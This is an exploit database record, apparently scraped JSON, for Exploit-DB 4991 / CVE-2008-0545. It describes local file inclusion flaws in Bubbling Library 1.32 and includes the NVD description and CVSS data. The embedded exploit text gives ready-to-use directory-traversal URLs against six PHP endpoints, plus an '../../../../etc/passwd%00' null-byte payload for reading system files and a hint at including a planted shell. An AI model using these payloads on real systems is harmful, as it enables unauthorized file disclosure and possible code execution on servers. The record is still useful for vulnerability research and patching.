Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities

{"bulletinFamily": "exploit", "id": "EDB-ID:4991", "cvelist": ["CVE-2008-0545"], "modified": "2008-01-26T00:00:00", "lastseen": "2016-01-31T22:16:06", "edition": 1, "sourceData": "## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities \n## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730\n## Author : Stack-Terrorist [v40]\n## Email : v.4@hotmail.fr\n\n## Home : http://www.v4-team.com\n## for execute exploit does not write extention of file\n## Other files: =../../../../etc/passwd%00 \n## exploit :\n# \n# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax\nhttp://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]\n# examples/dispatcher/framework/simple.php?page=/home/user/shell\nhttp://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]\n\nGreetz : H-T Team , v4 Team , Tryag , no-hack all my friend \nSpecial tnx for : Houssamix\nthx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke \n\n# milw0rm.com [2008-01-26]\n", "published": "2008-01-26T00:00:00", "href": "https://www.exploit-db.com/exploits/4991/", "osvdbidlist": ["41181", "41180", "41185", "41182", "41184", "41183"], "reporter": "Stack", "hash": "7103338296c3ddd0e673d5af66065bbd1f21e0db6374238f2e435cecb7683c70", "title": "Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities. CVE-2008-0545. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4991/", "enchantments": {"vulnersScore": 3.7}}

{"result": {"cve": [{"id": "CVE-2008-0545", "type": "cve", "title": "CVE-2008-0545", "description": "Multiple directory traversal vulnerabilities in Bubbling Library 1.32 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) uri parameter to (a) yui-menu.tpl.php, (b) simple.tpl.php, and (c) advanced.tpl.php in dispatcher/framework/; and the (2) page parameter to (d) yui-menu.php, (e) simple.php, and (f) advanced.php in dispatcher/framework/, different vectors than CVE-2008-0521.", "published": "2008-02-01T15:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0545", "cvelist": ["CVE-2008-0545"], "lastseen": "2017-08-08T11:24:29"}]}}